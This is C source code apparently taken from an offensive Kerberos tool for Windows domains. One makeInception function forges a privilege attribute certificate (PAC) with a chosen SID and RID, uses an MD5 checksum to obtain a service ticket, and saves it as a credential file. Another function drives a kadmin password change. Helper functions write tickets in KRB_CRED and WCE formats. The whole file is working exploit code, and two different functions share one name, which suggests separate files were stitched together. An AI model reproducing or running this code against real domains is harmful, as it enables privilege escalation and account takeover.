void makeInception(PCSTR user, PCSTR domain, PCSTR newpassword, EncryptionKey *key, PCSTR kdc, WORD port, WORD kadminPort)
{
SOCKET connectSocket, connectSocketAdmin;
OssBuf AsReq, ApReq, KrbPrivReq;
KDC_REP *AsRep;
AP_REP *ApRep;
KRB_PRIV *KrbPriv;
EncKDCRepPart *encAsRepPart;
_octet1 password;
EncryptionKey authKey;
UInt32 seq;
EncKrbPrivPart *encKrbPrivPart;
password.length = strlen(newpassword);
password.value = (unsigned char *) newpassword;
if(kull_m_sock_initSocket(kdc, port, &connectSocket))
{
kprintf(" [level 1] Reality (AS-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, "kadmin", "changepw", NULL, FALSE, NULL, NULL, &AsReq))
{
if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU))
{
if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU))
{
kprintf(" [level 2] Van Chase (AP-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_ApReq(&ApReq, user, domain, &AsRep->ticket, &encAsRepPart->key, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, &authKey, &seq))
{
kprintf(" [level 3] The Hotel (KRB-PRIV - REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KrbPriv(&password, &authKey, "wtf", &KrbPrivReq, &seq))
{
if(kull_m_sock_initSocket(kdc, kadminPort, &connectSocketAdmin))
{
if(kull_m_kerberos_helper_net_callKadminOssBuf(&connectSocketAdmin, &ApReq, &KrbPrivReq, &ApRep, &KrbPriv))
{
kprintf(" [level 4] Snow Fortress (KRB-PRIV - REP)\n");
if(kull_m_kerberos_asn1_helper_build_EncKrbPrivPart_from_Priv(KrbPriv, &encKrbPrivPart, &authKey))
{
kprintf(" [level 5] Limbo ! : ");
retFromKadmin(&encKrbPrivPart->user_data);
kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbPrivPart_PDU, encKrbPrivPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(KRB_PRIV_PDU, KrbPriv);
kull_m_kerberos_asn1_helper_ossFreePDU(AP_REP_PDU, ApRep);
}
kull_m_sock_termSocket(&connectSocketAdmin);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(KrbPrivReq.value);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(ApReq.value);
}
kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value);
}
kull_m_sock_termSocket(&connectSocket);
}
}
BOOL kiwi_krbcred_write(KRB_CRED *cred, OssBuf *output)
{
BOOL status = FALSE;
OssBuf tmp = {0, NULL};
output->length = 0;
output->value = NULL;
if(!kull_m_kerberos_asn1_helper_ossEncode(KRB_CRED_PDU, cred, &tmp))
{
if(output->value = (unsigned char *) LocalAlloc(LPTR, tmp.length))
{
RtlCopyMemory(output->value, tmp.value, tmp.length);
output->length = tmp.length;
status = TRUE;
}
kull_m_kerberos_asn1_helper_ossFreeBuf(tmp.value);
}
else PRINT_ERROR("%s", kull_m_kerberos_asn1_helper_ossGetErrMsg());
if(!status && output->value)
{
output->length = 0;
LocalFree(output->value);
}
return status;
}
void makeInception(PCSTR user, PCSTR domain, PSID sid, DWORD rid, PCSTR target, PCSTR service, EncryptionKey *key, PCSTR kdc, WORD port, PCSTR filename)
{
SOCKET connectSocket;
OssBuf AsReq, TgsReq;
KDC_REP *AsRep, *TgsRep;
EncKDCRepPart *encAsRepPart, *encTgsRepPart;
_octet1 pac;
if(kull_m_sock_initSocket(kdc, port, &connectSocket))
{
kprintf(" [level 1] Reality (AS-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, NULL, NULL, FALSE, NULL, NULL, &AsReq))
{
if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU))
{
if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU))
{
kprintf(" [level 2] Van Chase (PAC TIME)\n");
if(giveMePac(user, sid, rid, &encAsRepPart->authtime, KERB_CHECKSUM_MD5, NULL, &pac))
{
kprintf(" [level 3] The Hotel (TGS-REQ)\n");
if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, &encAsRepPart->key, service, target, FALSE, &AsRep->ticket, &pac, &TgsReq))
{
if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &TgsReq, (LPVOID *) &TgsRep, TGS_REP_PDU))
{
if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(TgsRep, &encTgsRepPart, &encAsRepPart->key, EncTGSRepPart_PDU))
{
kprintf(" [level 4-5] Limbo (KRB-CRED)\n");
kull_m_kerberos_helper_util_SaveRepAsKrbCred(TgsRep, encTgsRepPart, filename);
kull_m_kerberos_asn1_helper_ossFreePDU(EncTGSRepPart_PDU, encTgsRepPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(TGS_REP_PDU, TgsRep);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(TgsReq.value);
}
LocalFree(pac.value);
}
kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart);
}
kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep);
}
kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value);
}
kull_m_sock_termSocket(&connectSocket);
}
}
BOOL kiwi_wce_write(KRB_CRED *cred, OssBuf *output)
{
BOOL status = FALSE;
PWCE_BUFF_TICKET outputTmp = NULL;
EncKrbCredPart * encKrbCredPart = NULL, credpart;
struct _seqof5 * nextInfos, infos;
struct _seqof3 * nextTicket, ticket;
KRB_CRED tmp;
DWORD i, count = 0;
PWCE_KERBEROS_TICKET pWce;
output->length = 0;
output->value = NULL;
if(!kull_m_kerberos_asn1_helper_ossDecode(EncKrbCredPart_PDU, (OssBuf *) &cred->enc_part.cipher, (LPVOID *) &encKrbCredPart))
{
status = TRUE;
for(nextTicket = cred->tickets, nextInfos = encKrbCredPart->ticket_info; nextTicket && nextInfos && status; nextTicket = nextTicket->next, nextInfos = nextInfos->next)
count++;
if(count && (outputTmp = (PWCE_BUFF_TICKET) LocalAlloc(LPTR, count * sizeof(WCE_BUFF_TICKET))))
{
for(nextTicket = cred->tickets, nextInfos = encKrbCredPart->ticket_info, i = 0; nextTicket && nextInfos && status; nextTicket = nextTicket->next, nextInfos = nextInfos->next, i++)
{
tmp.pvno = 5;
tmp.msg_type = 22;
tmp.enc_part.bit_mask = 0;
tmp.enc_part.etype = KERB_ETYPE_NULL;
tmp.enc_part.cipher.length = 0;
tmp.enc_part.cipher.value = NULL;
tmp.tickets = &ticket;
credpart.bit_mask = 0;
credpart.ticket_info = &infos;
ticket = *nextTicket;
ticket.next = NULL;
infos = *nextInfos;
infos.next = NULL;
outputTmp[i].SessionKey.length = infos.value.key.keyvalue.length;
if(outputTmp[i].SessionKey.length && (outputTmp[i].SessionKey.value = (PBYTE) LocalAlloc(LPTR, outputTmp[i].SessionKey.length)))
{
RtlCopyMemory(outputTmp[i].SessionKey.value, infos.value.key.keyvalue.value, outputTmp[i].SessionKey.length);
if(!kull_m_kerberos_asn1_helper_ossEncode(EncKrbCredPart_PDU, &credpart, (OssBuf *) &tmp.enc_part.cipher))
{
if(!kiwi_krbcred_write(&tmp, &outputTmp[i].Ticket))
PRINT_ERROR("writing KRB_CRED\n");
kull_m_kerberos_asn1_helper_ossFreeBuf(tmp.enc_part.cipher.value);
}
else PRINT_ERROR("%s", kull_m_kerberos_asn1_helper_ossGetErrMsg());
}
}
kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbCredPart_PDU, encKrbCredPart);
for(i = 0; i < count; i++)
output->length += FIELD_OFFSET(WCE_KERBEROS_TICKET, data) + outputTmp[i].SessionKey.length + outputTmp[i].Ticket.length;
output->length += FIELD_OFFSET(WCE_KERBEROS_TICKET, data);
if(output->value = (PBYTE) LocalAlloc(LPTR, output->length))
{
status = TRUE;
for(pWce = (PWCE_KERBEROS_TICKET) output->value, i = 0; i < count; pWce = (PWCE_KERBEROS_TICKET) (pWce->data + pWce->encodedTicketSize + pWce->sessionKeySize), i++)
{
pWce->header = WCE_KERBEROS_TICKET_HEADER;
pWce->sessionKeySize = outputTmp[i].SessionKey.length;
pWce->encodedTicketSize = outputTmp[i].Ticket.length;
if(outputTmp[i].SessionKey.length && outputTmp[i].SessionKey.value)
{
RtlCopyMemory(pWce->data, outputTmp[i].SessionKey.value, pWce->sessionKeySize);
LocalFree(outputTmp[i].SessionKey.value);
}
if(outputTmp[i].Ticket.length && outputTmp[i].Ticket.value)
{
RtlCopyMemory(pWce->data + pWce->sessionKeySize, outputTmp[i].Ticket.value, pWce->encodedTicketSize);
LocalFree(outputTmp[i].Ticket.value);
}
}
pWce->header = WCE_KERBEROS_TICKET_HEADER;
pWce->sessionKeySize = 0;
pWce->encodedTicketSize = 0;
}
}
else PRINT_ERROR("%s\n", kull_m_kerberos_asn1_helper_ossGetErrMsg());
}
if(!status && output->value)
LocalFree(output->value);
return status;
}
